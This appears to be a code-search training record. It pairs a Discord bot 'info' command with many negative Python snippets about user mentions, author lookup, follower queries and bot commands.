async def info(self,ctx,*,person:discord.Member = None): if not person: guild = len(self.bot.guilds) member = len(set(self.bot.get_all_members())) app = await self.bot.application_info() msg = "Name:{}".format(self.bot.user) if ctx.message.guild.me.nick: msg += "\nNickname:{}".format(ctx.message.guild.me.nick) msg += "\nCreator: {}".format(app.owner) msg += "\nServer:{}\nMembers:{}".format(guild,member) link = "If you want to invite this bot to your server, you can check it out here <http://nurevam.site>!" return await self.bot.say(ctx,content = "```xl\n{}\n```\n{}\n".format(msg,link)) else: e = discord.Embed() e.title = "{} - {}".format(person,person.id) e.set_thumbnail(url = person.avatar_url) e.add_field(name = "Created at", value="{} - ({})".format(person.created_at,self.get_time_delta(person.created_at)),inline=False) e.add_field(name = "Joined at", value="{} - ({})".format(person.joined_at,self.get_time_delta(person.joined_at)),inline=False) e.add_field(name = "Total Roles", value=str(len(person.roles)),inline=False) if person.colour.value: e.colour = person.color await self.bot.say(ctx,embed = e)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def mention(self) -> str:", "def mention(self) -> str:", "def display_person(person):\n name = person['name']\n followers = person['follower_count']\n description = person['description']\n country = person['country']\n print(f'{name}, a(n) {description}, from {country}.')\n return followers", "async def user(self, ctx, member: discord.Member = None):\r\n rank = 1\r\n if member is None:\r\n member = ctx.author\r\n x = member.name\r\n for (k, v) in sorted(player.items(), key=lambda x: expose(x[1]), reverse=True):\r\n if k == x:\r\n start = '```md' + u\"\\u000A\" + '-'*68 + u\"\\u000A\" + u\"\\u000A\" + 'User Info: '\r\n middle = u\"\\u000A\" + u\"\\u000A\" + '[rank][#' + str(rank) + '] [rating]['\r\n end = str(round(expose(v), 2)) + '] [skill][' + str(round(v.mu, 2)) + '] [uncertainty]['\r\n await ctx.send(start + k + middle + end + str(round(v.sigma, 2)) + ']' + u\"\\u000A\" + u\"\\u000A\" + '-'*68 + u\"\\u000A\" + '```')\r\n if rank == 1:\r\n await ctx.send(k + ' is the G O A T 🐐')\r\n break\r\n rank += 1", "def get_person_text(self, uid):\n words = \"\"\n\n query = \"\"\"\nSELECT ?overview ?researchO ?label\nWHERE\n{\n <%s> <http://vivoweb.org/ontology/core#overview> ?overview .\n <%s> <http://vivoweb.org/ontology/core#researchOverview> ?researchO .\n <%s> <http://www.w3.org/2000/01/rdf-schema#label> ?label .\n}\n \"\"\" % (uid, uid, uid)\n self.setQuery(query)\n try:\n rval = self.query()\n try:\n g = rval.convert()\n except:\n pass\n words = \"%s %s %s\" % (g['results']['bindings'][0]['overview']['value'], g['results']['bindings'][0]['researchO']['value'], g['results']['bindings'][0]['label']['value'])\n except:\n print \"Select failed: %s\" % query\n\n self.setQuery(\"\"\"\nPREFIX rdf: <http://www.w3.org/1999/02/22-rdf-syntax-ns#>\nPREFIX rdfs: <http://www.w3.org/2000/01/rdf-schema#>\nPREFIX vivo: <http://vivoweb.org/ontology/core#>\nPREFIX xsd: <http://www.w3.org/2001/XMLSchema#>\nSELECT ?name\nWHERE\n{\n ?auth vivo:relates <%s> .\n ?auth rdf:type vivo:Authorship .\n ?auth vivo:relates ?art .\n filter (?art!=<%s>) .\n ?art <http://vivoweb.org/ontology/core#dateTimeValue> ?date .\n ?date <http://vivoweb.org/ontology/core#dateTime> ?year .\n filter (?year>\"2009-01-01T00:00:00Z\"^^xsd:dateTime) .\n ?art rdfs:label ?name .\n}\nLIMIT 20\n\"\"\" % (uid, uid))\n try:\n rval = self.query()\n try:\n g = rval.convert()\n except:\n pass\n for t in g['results']['bindings']:\n words = words + \" \" + t['name']['value']\n\n except:\n print \"Select failed\"\n traceback.print_exc(file=sys.stdout)\n\n self.setQuery(\"\"\"\nPREFIX rdf: <http://www.w3.org/1999/02/22-rdf-syntax-ns#>\nPREFIX rdfs: <http://www.w3.org/2000/01/rdf-schema#>\nPREFIX vivo: <http://vivoweb.org/ontology/core#>\nPREFIX xsd: <http://www.w3.org/2001/XMLSchema#>\n\nSELECT ?name\nWHERE\n{\n ?grant vivo:relates <%s> .\n ?grant rdf:type vivo:Grant .\n ?grant <http://vivoweb.org/ontology/core#dateTimeInterval> ?date .\n ?date <http://vivoweb.org/ontology/core#end> ?end .\n ?end <http://vivoweb.org/ontology/core#dateTime> ?year .\n filter (?year>\"2009-01-01T00:00:00Z\"^^xsd:dateTime) .\n ?grant rdfs:label ?name .\n}\n\n \"\"\" % (uid))\n try:\n rval = self.query()\n try:\n g = rval.convert()\n except:\n pass\n\n for t in g['results']['bindings']:\n words = words + \" \" + t['name']['value']\n\n except:\n print \"Select failed\"\n traceback.print_exc(file=sys.stdout)\n\n\n\n\n return words", "def author_following(self):\n\t\tpass", "async def ign_whoami(self, ctx):\n user = ctx.message.author\n igns = self.names.get(user.mention)\n if not igns:\n await self.bot.say(\"You have not yet entered any IGN info. :cry:\".format(user.mention))\n else:\n await self.bot.say(self.format_igns(user, igns))", "def mention(result):\n return result.text.find('@') != -1", "def mention(self) -> str:\n raise NotImplementedError", "async def ign_whois(self, user: discord.Member):\n igns = self.names.get(user.mention)\n if not igns:\n await self.bot.say(\"{0} has not yet entered any IGN info. :cry:\".format(user.mention))\n else:\n await self.bot.say(self.format_igns(user, igns))", "def mention(cls, user, message, mentioned):\r\n pass", "def detect_author(user_to_tweets: Dict[str, List[tuple]], tweet_text: str) -> \\\n str:\n acc = []\n \n for keys in user_to_tweets:\n author_hashes = hashtag_seperator(user_to_tweets[keys])\n text_hashes = extract_hashtags(tweet_text)\n if set(text_hashes).issubset(author_hashes):\n acc.append(keys)\n if len(acc) == 1:\n return acc[0]\n return 'unknown'", "def get_info(hit):\n mention = Mention(hit)\n return dict(\n url = mention.info[\"url\"],\n title = mention.info[\"title\"],\n date = mention.info[\"datetime_date\"] or datetime.date(1970, 1, 1),\n type = 'news' if mention.in_the_news else 'print',\n author = '(need author)',\n media = mention.info[\"media\"],\n )", "def _get_user_mention(self, name: str) -> str:\n try:\n return self.known_user_ids[name]\n except KeyError:\n pass\n\n mention = name\n users = get_value_from_redis('slack-members') or []\n user = self._get_user(name, users)\n if user:\n mention = f'<@{user[\"id\"]}>'\n\n self.known_user_ids[name] = mention\n\n return mention", "def get_author_info(self, author: str):\n for writer_word in self._writer_words:\n data = json.loads(requests.get(WIKIDATA_SEARCH + \"&srsearch=\" + author + \" \" + writer_word).text)\n pages = data.get(\"query\").get(\"search\")\n if len(pages) >= 1:\n pageid = pages[0].get(\"title\")\n author_details = self._reference.author_map.get(author)\n if author_details:\n return author_details\n if pageid == -1:\n continue\n\n else:\n response = requests.get(WIKIDATA_PARSE + pageid + \".json\")\n data = json.loads(response.text)\n if author.lower() not in data.get(\"entities\").get(pageid).get(\"labels\").get(\"en\").get(\"value\").lower():\n continue\n else:\n try:\n id = data.get(\"entities\").get(pageid).get(\"claims\").get(\"P31\")[0].get(\"mainsnak\").get(\"datavalue\").get(\"value\").get(\"id\")\n if str(id) != \"Q5\": # the id for human\n continue\n except IndexError:\n continue\n properties = data.get(\"entities\").get(pageid).get(\"claims\")\n author_details = {\"id\": pageid, \"gender\": self.get_gender(properties)}\n country_details = self.get_country(properties)\n author_details[\"country\"] = country_details\n self._reference.author_map[author] = author_details\n return author_details\n return {\"id\": \"Unknown\", \"gender\": \"Unknown\", \"country\": [{\"name\": \"Unknown\", \"region\": \"Unknown\"}]}", "async def love(ctx, user: discord.Member):\r\n author = ctx.message.author\r\n if user.id == ctx.bot.user.id:\r\n await ctx.send(\"I am not capable of loving like you can. I'm sorry.\" )\r\n else:\r\n await ctx.send(author.mention + \" is capable of loving \" + user.mention + \" a whopping \" +\r\n str(randint(0, 100)) + \"%!\")\r\n ctx.counter(n)", "def replace_user_mentions(text):\n text = re.sub('\\B@\\w*[a-zA-Z]+\\w*', 'USERMENTION', text)\n return text", "def author(self):\n\t\tauthor = re.search(r\"([Ff]rom\\s)(.+) ([tT]\\s*o)([^,]+),\",self.raw_text()[:150])\n\t\treport = re.search(r\".*[Rr]eport of ([^,]+),\",self.raw_text()[:150])\n\t\torder = re.search(r\".*[Oo]rder of ([^,]+)[,.]* to\",self.raw_text()[:250])\n\t\torder2 = re.search(r\".*[Oo]rder of ([^,]+),\",self.raw_text()[:250])\n\t\tlogbook = re.search(r\".*[lL]og of ([^,]+)[,.]\",self.raw_text()[:250])\n\t\tif order:\n\t\t\torder = order.group(1)\n\t\t\treturn order\n\t\tif order2:\n\t\t\torder2 = order2.group(1)\n\t\t\treturn order2\n\t\tif logbook:\n\t\t\tlogbook = logbook.group(1)\n\t\t\treturn logbook\n\t\tif report:\n\t\t\treport = report.group(1)\n\t\t\treturn report\n\t\tif author: \t\n\t\t\tauthor = author.group(2) \n\t\t\tauthor = re.sub(r\"([^,]*),.*\",r\"\\1\",author)\t \n\t\t\treturn author\n\t\t\n\t\treturn \"Unknown\"", "def covid_mention(text, synonyms=covid_list):\n for term in synonyms:\n if term in text:\n return 'Yes'\n continue\n return 'No'", "def mention(bot, msg):\n\n if msg.command != \"PRIVMSG\":\n return\n\n message = msg.args[1]\n\n if bot.nickname.lower() in message.lower():\n bot.privmsg(msg.sendername, \"You called?\")", "def followed_by_hillary_and_donald(users, twitter):\n ###TODO-- Completed\n for user in users:\n if user['screen_name'] == 'HillaryClinton':\n friends_Hillary = user['friends']\n #print(len(friends_Hillary))\n elif user['screen_name'] == 'realDonaldTrump':\n friends_donald = user['friends']\n #print(len(friends_donald))\n\n common_followed_id = list(set(friends_Hillary) & set(friends_donald))\n\n commn_followed_user = robust_request(twitter,'users/lookup',{'user_id':common_followed_id}).json()\n #print(commn_followed_user[0]['screen_name'])#['screen_name'])\n return commn_followed_user[0]['screen_name']\n #pass", "def parse_direct_mention(message_text):\n # print(message_text)\n matches = re.search(MENTION_REGEX, message_text)\n # the first group contains the username, the second group contains the remaining message\n return (matches.group(1), matches.group(2).strip()) if matches else (None, None)", "def _parse_text_as_direct_mention(\n message_text: str,\n ) -> tuple[Optional[str], Optional[str]]:\n matches = re.search(MENTION_REGEX, message_text)\n # the first group contains the username, the second group contains the remaining message\n if matches:\n return matches.group(1), matches.group(2).strip()\n return None, None", "def mention_user(self, username: str) -> str:\n member = self.get_user(username)\n if member:\n return member.mention\n return username", "def crawl_person_infos(uid):\n if not uid:\n return\n\n user = user_get.get_profile(uid)\n # If it's enterprise user, just skip it\n if user.verify_type == 2:\n set_seed_other_crawled(uid)\n return\n\n # Crawl fans and followers\n celery.send_task('celery_tasks.weibo.user.crawl_follower_fans', args=(uid,), queue='fans_followers',\n routing_key='for_fans_followers')", "def displayFolowers(database):\n firstname=str(input(\"who do you want to display followers :\"))\n usr,find=getByName(database,firstname)\n if find:\n print(f\"{usr.firstname} {usr.lastname} is folowed by:\")\n for folower in usr.folowed:\n print(folower)", "def mention(cls, user, message, mentioned):\n pass", "def test_refersto_author_multi_name(self):\n inv_search = 'author:ellis refersto:author:\"parke, s. j.\"'\n spi_search = 'find a ellis and refersto author \"parke, s. j.\"'\n self._compare_searches(inv_search, spi_search)", "def parse_direct_mention(message_text):\n matches = re.search(MENTION_REGEX, message_text)\n print (matches)\n # the first group contains the username, the second group contains the remaining message\n return (matches.group(1), matches.group(2).strip()) if matches else (None, None)", "def userFollowers(nick):\n if (len(nick) != 1):\n print \"Has d'introduir només un nick\"\n return\n i.userFollow(nick[0])", "def parse_direct_mention(message_text):\n\tmatches = re.search(MENTION_REGEX, message_text)\n\t# the first group contains the username, the second group contains the remaining message\n\treturn (matches.group(1), matches.group(2).strip()) if matches else (None, None)", "def parse_direct_mention(message_text):\n matches = re.search(MENTION_REGEX, message_text)\n # 1st gourp has username, 2nd group called remaining message\n return (matches.group(1), matches.group(2).strip()) if matches else (None, None)", "def detect_person(snap):\n pass", "def parse_direct_mention(self,message_text):\n matches = re.search(self.MENTION_REGEX, message_text)\n # the first group contains the username, the second group contains the remaining message\n return (matches.group(1), matches.group(2).strip()) if matches else (None, None)", "def parse_direct_mention(message_text):\r\n matches = re.search(MENTION_REGEX, message_text)\r\n # the first group contains the username, the second group contains the remaining message\r\n return (matches.group(1), matches.group(2).strip()) if matches else (None, None)", "def mentor_list_view(request):\n # TODO: this view\n pass", "def user(inp):\n user = inp.text.lower().replace(' ', '-')\n return 'http://www.wikidot.com/user:info/' + user", "def test_author_many_lastnames(self):\n inv_search = 'author:\"alvarez gaume, j* r* r*\"'\n spi_search = 'find a alvarez gaume, j r r'\n self._compare_searches(inv_search, spi_search)", "def followed_by_hillary_and_donald(users, twitter):\n\n str = ''\n set1 = set()\n set2 = set()\n for u_dict in users:\n \tif u_dict['screen_name'] == 'HillaryClinton':\n \t\tset1 = set(u_dict['friends'])\n \telif u_dict['screen_name'] == 'realDonaldTrump':\n \t\tset2 = set(u_dict['friends'])\n \t\t\n common = set.intersection(set1, set2)\n request = robust_request(twitter, 'users/lookup', {'user_id': common}, max_tries=5)\n for user in request:\n \tstr = user['screen_name']\t\n return str", "async def info(self, context):\n await context.send('creador: debellisnahuel@gmail.com\\ncolabs:\\n emi: https://twitter.com/emilianosce/ o https://www.instagram.com/emilianosce/ \\n garza: https://twitter.com/Matias_Garcia00 o https://www.twitch.tv/garzangb')", "def compute_user_mentions_name(row):\n entity_series = pd.read_json(json.dumps(row['entities']), typ='series')\n user_mentions_name = list(map(lambda entry: entry['name'], entity_series['user_mentions']))\n return ','.join(user_mentions_name)", "def mentee_list_view(request):\n # TODO: this view\n pass", "def is_explicit_mention(self, bot):\n for um in self.original.entities['user_mentions']:\n if um['screen_name'] == bot.screen_name:\n this_is_an_xm = um['indices'][0] >= self.original.display_text_range[0]\n this_is_an_xm &= um['indices'][1] <= self.original.display_text_range[1]\n if this_is_an_xm:\n return True\n return False", "def parse_direct_mention(message_text):\n matches = re.search(MENTION_REGEX, message_text)\n # the first group contains the username, the second group contains\n # the remaining message\n return (matches.group(1),\n matches.group(2).strip()) if matches else (None, None)", "def like_to_party(msg):\n if message.rate_limit(msg.settings, 'like_to_party'):\n return\n return \"%s, I know for a fact you don't party. You do *not* party.\" \\\n % msg.name", "def parse_direct_mention(message_text):\n matches = re.search(MENTION_REGEX, message_text)\n # the first group contains the username, the second group contains the remaining message\n return (matches.group(1), matches.group(2).strip()) if matches else (None, None)", "def parse_direct_mention(message_text):\n matches = re.search(MENTION_REGEX, message_text)\n # the first group contains the username, the second group contains the remaining message\n return (matches.group(1), matches.group(2).strip()) if matches else (None, None)", "def parse_direct_mention(message_text):\n matches = re.search(MENTION_REGEX, message_text)\n # the first group contains the username, the second group contains the remaining message\n return (matches.group(1), matches.group(2).strip()) if matches else (None, None)", "def parse_direct_mention(message_text):\n matches = re.search(MENTION_REGEX, message_text)\n # the first group contains the username, the second group contains the remaining message\n return (matches.group(1), matches.group(2).strip()) if matches else (None, None)", "def parse_direct_mention(message_text):\n matches = re.search(MENTION_REGEX, message_text)\n # the first group contains the username, the second group contains the remaining message\n return (matches.group(1), matches.group(2).strip()) if matches else (None, None)", "def who_am_i():\n return {'name': 'Jonathan Martinez', 'id': '201095569', 'email': 'martijon@post.bgu.ac.il'}", "def parse_direct_mention(message_text):\n matches = re.search(MENTION_REGEX, message_text)\n # the first group contains the username, the second group\n # contains the remaining message\n return (matches.group(1),\n matches.group(2).strip()) if matches else (None, None)", "def get_mentions(texts, word):\r\n mentions = {}\r\n for text, label, text_id in texts:\r\n if word in text.lower():\r\n if label not in mentions:\r\n mentions[label] = [text_id]\r\n else:\r\n if text_id not in mentions[label]:\r\n mentions[label].append(text_id)\r\n return mentions", "def _talk_about(self, about, data):\n if not data:\n return\n\n if about == 'faces':\n for face in data:\n self._seen_faces.append(face['identity'])\n\n all_people = list(set(self._seen_faces))\n all_known_people = [name for name in all_people if name is not None]\n\n if len(all_known_people) == 0:\n text = \"Hello. I haven't seen you before. Welcome!\"\n elif len(all_known_people) == 1:\n text = \"Hello {}\".format(all_known_people[0])\n elif len(all_people) <= 3:\n all_but_last = ', '.join([name or 'stranger' for name in all_people[:-1]])\n last = all_people[-1] or 'stranger'\n names = ' and '.join([all_but_last, last])\n text = 'Hello {}'.format(names)\n elif len(all_known_people) > 3:\n text = 'Hi everybody. What a crowd! Why don\\'t you get back to work?'\n self._say_prudent(text)", "def parse_direct_mention(message_text):\n matches = re.search(MENTION_REGEX, message_text)\n # the first group contains the username, the second group contains the remaining message\n return (matches.group(1), matches.group(2).strip()) if matches else (None, message_text.strip())", "def person_f(x: Text) -> Tuple[Text, Text]:\n return \"person\", x.lower()", "def get_bookshare_user_info(patron):\n pass", "def find_new_people(self):\n #greets people, only greets once while they're in the camera's view and are center of attention\n\n\n if (self.person is not None) and (self.person.acknowledged == False):\n self.person.acknowledged = True\n print \"I see you!\"\n self.idle_pub.publish(\"idle:stop\")\n time.sleep(2)\n\n greeting = [\"R_nudge\",\"R_look\"]\n for msg in greeting:\n self.behavior_pub.publish(msg)\n self.check_completion()\n\n\n self.detection_pub.publish('found')\n\n elif self.person is None:\n print \"I don't see you\"\n self.detection_pub.publish('nothing')", "async def info(self, ctx, *, member: disnake.Member = None):\n\n member = member or ctx.author\n\n e = disnake.Embed(description=\"\")\n\n if member.bot:\n e.description = \"This account is a bot.\\n\\n\"\n\n e.description += member.mention\n\n e.add_field(name=\"Status\", value=member.status)\n\n if member.activity:\n e.add_field(name=\"Activity\", value=member.activity.name)\n\n e.set_author(name=str(member), icon_url=member.display_avatar.url)\n\n now = datetime.now(timezone.utc)\n created = member.created_at\n joined = member.joined_at\n\n e.add_field(\n name=\"Account age\",\n value=\"{0} • Created <t:{1}:F>\".format(\n pretty_timedelta(now - created), round(created.timestamp())\n ),\n inline=False,\n )\n\n e.add_field(\n name=\"Member for\",\n value=\"{0} • Joined <t:{1}:F>\".format(\n pretty_timedelta(now - joined), round(joined.timestamp())\n ),\n )\n\n if len(member.roles) > 1:\n e.add_field(\n name=\"Roles\",\n value=\" \".join(role.mention for role in reversed(member.roles[1:])),\n inline=False,\n )\n\n e.set_footer(text=\"ID: \" + str(member.id))\n\n await ctx.send(embed=e)", "def test_citedby_author(self):\n inv_search = 'citedby:author:doggy'\n spi_search = 'find citedby author doggy'\n self._compare_searches(inv_search, spi_search)", "def mention(self) -> str:\n return f\"<@{self.id}>\"", "def process_person(self,msg):\n self.personx = msg.x\n self.persony = msg.y", "def somebody(g, name, homepage, who=None):\n FOAF = Namespace(\"http://xmlns.com/foaf/0.1/\")\n if not who:\n who = BNode()\n g.add((who, FOAF.name, Literal(name)))\n g.add((who, FOAF.homepage, URIRef(homepage)))\n #if email:\n # g.add((who, FOAF.homepage, URIRef(\"mailto:%s\" % email)))\n return who", "def test_refersto_author(self):\n inv_search = 'refersto:author:kitty'\n spi_search = 'find refersto author kitty'\n self._compare_searches(inv_search, spi_search)", "def personUp(person):\n\timport os\n\timport wikipedia\n\timport speak\n\ttry:\n\t\tsay(wikipedia.summary(person,sentences=2))\n\t\t# os.system('clear')\n\texcept wikipedia.exceptions.DisambiguationError:\n\t\tresults = wikipedia.search(person)\n\t\tos.system('clear')\n\t\tspeak.speak('The closest I could find was : ' + results[1])\n\t\tsay(wikipedia.summary(results[1],sentences=2))\n\texcept Exception:\n\t\tsay(\"Couldn't find anything...\")", "def test_refersto_author_multi_name_no_quotes(self):\n inv_search = 'author:ellis refersto:(author:\"parke, sj*\" or exactauthor:\"parke, s *\" or exactauthor:\"parke, s\" or author:\"parke, sj, *\")'\n spi_search = \"find a ellis and refersto author parke, sj\"\n self._compare_searches(inv_search, spi_search)", "async def info_user(self, ctx, member: Optional[discord.Member]):\n member1 = member or ctx.author\n embed = discord.Embed(title=\"Member Information\",\n color=discord.Color.blurple(),\n timestamp=datetime.utcnow())\n\n embed.add_field(name=\"ID\", value=f\"{member1.id}\", inline=False)\n embed.add_field(\n name=\"Name\", value=f\"{member1.name}#{member1.discriminator}\")\n embed.add_field(name=\"Top role\", value=f\"{member1.top_role.mention}\")\n embed.add_field(name=\"status\",\n value=f\"{str(member1.activity.type).split('.') if member1.activity else 'N/A'} {member1.activity.name if member1.activity else ''}\")\n embed.add_field(\n name=\"created at\", value=f\"{member1.created_at.strftime('%d/%m/%y %H:%M:%S')}\")\n embed.add_field(\n name=\"Joined at\", value=f\"{member1.joined_at.strftime('%d/%m/%y %H:%M:%S')}\")\n embed.add_field(name=\"Boosted?\", value=f\"{member1.premium_since}\")\n\n await ctx.reply(embed=embed)", "def test_citedby_refersto_author(self):\n inv_search = 'refersto:citedby:author:penguin'\n spi_search = 'find refersto citedby author penguin'\n self._compare_searches(inv_search, spi_search)", "def get_mentions(fname):\n capture = re.compile('NPRI in ?.* ?(news|print)', re.I)\n with open(fname) as fp:\n for line in fp:\n line = line.strip()\n if capture.search(line):\n yield get_info(line)", "async def confused(self, ctx, member: discord.Member = None):\n member = member if member else ctx.author\n members = [m for m in ctx.guild.members if not m == member]\n async with ctx.typing():\n image = await self.request(endpoint=\"generators/confused\", params=f\"?avatar={member.avatar_url_as(format='png')}&photo={random.choice(members).avatar_url_as(format='png')}\")\n await ctx.send(f\"**{member.name}** is confusion.\", file=discord.File(image, filename=\"file.png\"))", "def who(id, client, name):\r\n exists = person.locate(id)\r\n\r\n if not exists:\r\n person.create(id, name)\r\n client.send_message(id, 'Hello ' + name + '''!\r\nI am your Journal Buddy :) My purpose is to help you manage your productivity!\r\n\r\nYou can:\r\n - Set up habits\r\n - Schedule events\r\n - Create a task pool\r\n - Set reminders\r\n - Add notes - tell me things you don’t want to forget! May it be a quote, or a movie you liked\r\n\r\nEvery month we can choose which tasks you would like to complete in the month ahead!\r\nEvery week I will help you set goals in terms of tasks and habits for the week ahead!\r\n\r\nThe more we get to know each other the more I will be able to help! Providing weekly analytics and suggestions for future performance. Tell me how you feel throughout your tasks, habits and events and I will share with you what I think will work best.\r\n\r\nType /setup to begin!''')\r\n\r\n users[id] = {\"last\": \"new user\"}\r\n elif not (users.keys().__contains__(id)):\r\n users[id] = {\"last\": \"welcome back\"}", "def parse_direct_mention(self, message_text):\n matches = re.search(self.MENTION_REGEX, message_text)\n # the first group contains the username, the second group contains the remaining message\n return (matches.group(1), matches.group(2).strip()) if matches else (None, None)", "def parse_direct_mention(self, message_text):\n matches = re.search(self.MENTION_REGEX, message_text)\n # the first group contains the username, the second group contains the remaining message\n return (matches.group(1), matches.group(2).strip()) if matches else (None, None)", "def taco_mention_callback(bot, message):\n\n cid = get_cid(message)\n store_name(message.from_user)\n\n chat = Chats.get(Chats.cid == message.chat.id)\n clean_chat(chat.mids, chat.cid, bot, None)\n\n ok_button = InlineKeyboardButton('OK', callback_data='delete:{}'.format(message.from_user.id))\n ok_keyboard = InlineKeyboardMarkup([[ok_button]])\n\n mentioned_users = list()\n for entity in message.entities:\n if entity.type == 'mention':\n user = message.text[entity.offset: entity.offset + entity.length].lower()\n mentioned_users.append(user)\n mentioned_users = list(set(mentioned_users))\n\n if len(mentioned_users) > 1:\n if chat.less is True:\n text = only_one_receiver_phrase.split('\\n')[0]\n else:\n text = only_one_receiver_phrase\n mid = bot.send_message(chat_id=cid,\n text=text,\n reply_to_message_id=get_mid(message),\n reply_markup=ok_keyboard,\n parse_mode='html').message_id\n\n chat.mids = [mid]\n chat.save()\n return\n\n sender = message.from_user\n receiver_username: str = ensure_no_at_sign(mentioned_users[0])\n\n try:\n receiver = bot.get_chat_member(chat_id=cid,\n user_id=receiver_username).user\n\n except Exception:\n \"\"\" here should be except UserNotParticipant, but it still raises this exception \"\"\"\n if chat.less is True:\n text = user_not_present_phrase.split('\\n')[0]\n else:\n text = user_not_present_phrase\n mid = bot.send_message(chat_id=cid,\n text=text.format(ensure_username(receiver_username)),\n reply_to_message_id=get_mid(message),\n reply_markup=ok_keyboard,\n parse_mode='html').message_id\n\n chat.mids = [mid]\n chat.save()\n\n return\n\n give_tacos(bot, message, sender, receiver)", "async def profilepicture(self, ctx):\n if not ctx.message.mentions:\n await ctx.send(embed=discord.Embed().set_image(\n url=ctx.author.avatar_url))\n else:\n for member in ctx.message.mentions:\n await ctx.send(embed=discord.Embed().set_image(\n url=member.avatar_url))", "def user_suggested(username):\n raise NotImplementedError()", "def follow_reciprocated(self, target):\n if random.randint(1, 1000) == 1: # 1 in 20 are public @replies\n self.tweet_user(target)\n else:\n try:\n self.dm_user(target)\n except:\n pass", "def whois( self, mess, args):\n user = self.get_sender_username(mess)\n args = args.strip().replace(' ', '_')\n if user in self.users:\n self.log.info('%s queried whois %s.' % (user, args))\n if args in self.users.values():\n return filter(lambda u: self.users[u] == args, self.users)[0]\n else:\n return 'Nobody!'", "def subject_info(intent, extra_info=[]):\n\n text = intent['inputTranscript'].lower()\n utterances = AS.load_file('sample_utterances.txt')\n\n # add \"book\" and \"books\" to every utterance\n for line in list(utterances):\n utterances.insert(0, line + \" book\")\n utterances.insert(0, line + \" books\")\n\n # tells how many characters needs to be dropped before the subject starts\n to_drop = 0\n\n for line in utterances:\n if text.startswith(line):\n to_drop = len(line)\n break\n\n # drops the characters and makes a list from the strings that are left\n text = text[to_drop:].strip()\n text_list = text.split(' ', len(text))\n\n subject_list = []\n keywords = [\"books\", \"book\", \"by\", \"published\", \"written\"]\n keyword = \"\"\n\n # Find out when the book name ends\n for word in text_list:\n if word not in keywords:\n subject_list.append(word)\n else:\n break\n\n subject = \" \".join(subject_list)\n\n # Get all the keywords in the middle, so they can be\n # all be dropped at once, eg written by, books by\n text_list = text_list[len(subject_list):]\n if text_list:\n word = text_list[0]\n while word in keywords:\n keyword += word + \" \"\n text_list = text_list[1:]\n if text_list:\n word = text_list[0]\n else:\n break\n\n # search for an author from the rest of the characters\n author_text = text[len(keyword):].strip()\n author = AS.search(author_text, False)\n if author is \"\":\n author = None\n\n # There might be old info in the extra_info (author), so \n # we need to clear it\n extra_info.clear()\n\n # add the author to extra info so it can be used in the Finna API call\n if author:\n extra_info += [\"author:\\\"\" + author + \"\\\"\"]\n elif intent['sessionAttributes'].get('author'):\n extra_info += [\n \"author:\\\"\" + intent['sessionAttributes']['author'] + \"\\\"\"\n ]\n\n # The Finna API call\n request = lookfor(term=subject, filter=extra_info)['json']\n\n return parse_subject(request, subject, {'author': author})", "def substantiate():", "def _guess_author(talk_url, document):\r\n elements = _AUTHOR_BIO_XPATH(document)\r\n if elements:\r\n author_bio_url = urljoin(SITE_URL, elements[0].get('href'))\r\n author_bio_document = html.parse(author_bio_url)\r\n return _clean_up_file_name(\r\n author_bio_document.find('/head/title').text.split('|')[0].strip()\r\n )\r\n \r\n logging.warning(\"Failed to guess the author of '%s'\", talk_url)\r\n return 'Unknown'", "async def imitate(self, ctx):\n message = ctx.message.content.strip(' ').split(' ')\n user_id = ''\n if len(message) == 1:\n response = self.message.returnMarkovMsgError()\n await self.bot.say(response)\n elif message[1].casefold() == 'me'.casefold():\n user_id = ctx.message.author.id\n print(user_id)\n else:\n user_id = message[1][2:-1]\n print(user_id)\n\n # if(does_markov_exist(user_id)):\n # markov_chain = get_markov_chain(user_id)\n # # Do something with chain\n # else:\n # # Make chain", "async def whoowns(ctx, bot: typing.Union[discord.Member, discord.User]):\n if not bot.bot:\n # pyright: reportUndefinedVariable=false\n return await r(ctx, \"Not a bot.\")\n\n data = await make_request(\"https://www.motiondevelopment.top/api/v1.2/bots/\", bot.id)\n\n e = discord.Embed(color=0xfecdea)\n e.description = f'**{data[\"owner_name\"]}** owns **{bot}**'\n\n await em(ctx, embed=e)", "async def info(\n self, ctx, *, user: Union[discord.Member, FetchUserConverter] = None\n ):\n\n user = user or ctx.author\n if ctx.guild is not None and isinstance(user, discord.User):\n user = ctx.guild.get_member(user.id) or user\n\n embed = discord.Embed()\n embed.set_author(name=str(user))\n\n embed.add_field(name=\"ID\", value=user.id, inline=False)\n embed.add_field(\n name=\"Joined\",\n value=format_date(getattr(user, \"joined_at\", None)),\n inline=False,\n )\n embed.add_field(\n name=\"Created\",\n value=format_date(user.created_at),\n inline=False,\n )\n\n if isinstance(user, discord.Member):\n roles = [role.name.replace(\"@\", \"@\\u200b\") for role in user.roles]\n if len(roles) > 10:\n roles = [*roles[:9], f\"and {len(roles) - 9} more\"]\n embed.add_field(name=\"Roles\", value=\", \".join(roles), inline=False)\n else:\n embed.set_footer(text=\"This user is not in this server.\")\n\n async def reputation(user_id):\n vouches = await self.bot.mongo.db.vouch.count_documents({str(user_id): True})\n reports = await self.bot.mongo.db.vouch.count_documents({str(user_id): False})\n return (vouches, reports)\n \n rep = await reputation(user.id)\n vouch_content = []\n if rep[0]:\n vouch_content.append(f\"{rep[0]} vouches\")\n if rep[1]:\n vouch_content.append(f\"{rep[1]} reports\")\n if len(vouch_content) == 0:\n vouch_content.append(\"User is not vouched or reported by anyone.\")\n\n embed.add_field(\n name = \"Vouches and Reports\",\n value = \", \".join(vouch_content)\n )\n\n embed.color = user.color\n embed.set_thumbnail(url=user.avatar_url)\n\n await ctx.send(embed=embed)", "def test_author_simple(self):\n invenio_search = 'author:\"ellis, j*\"'\n spires_search = 'find a ellis, j'\n self._compare_searches(invenio_search, spires_search)", "def get_article_author(self, article_webpage):\n pass", "def author_name(text):\n tag = text.split()\n\n \"\"\"\n We take the beginning of the text since the\n author name will likely be there\n \"\"\"\n\n tag = tag[:100]\n author = []\n\n current_tag = 0\n \"\"\"\n We go through each word until we find the first instance\n of the word 'by' or 'author', which should mean the author\n will be written right after that.\n We save the first word after 'by' or 'author' since it should\n be the authors first name\n \"\"\"\n\n for word in tag:\n if (word.lower() == ('by') or\n word.lower() == ('author') or\n word.lower() == ('author:')):\n\n author.append(tag[current_tag+1].decode(encoding='UTF8',\n errors='ignore'))\n current_tag += 1\n tag = tag[current_tag+1:]\n break\n current_tag += 1\n\n \"\"\"\n We go through each word after the first name of the author\n until we find a word that is not capitalized. We assume that\n it marks the end of the author name.\n We then return a list of the author's name split up.\n 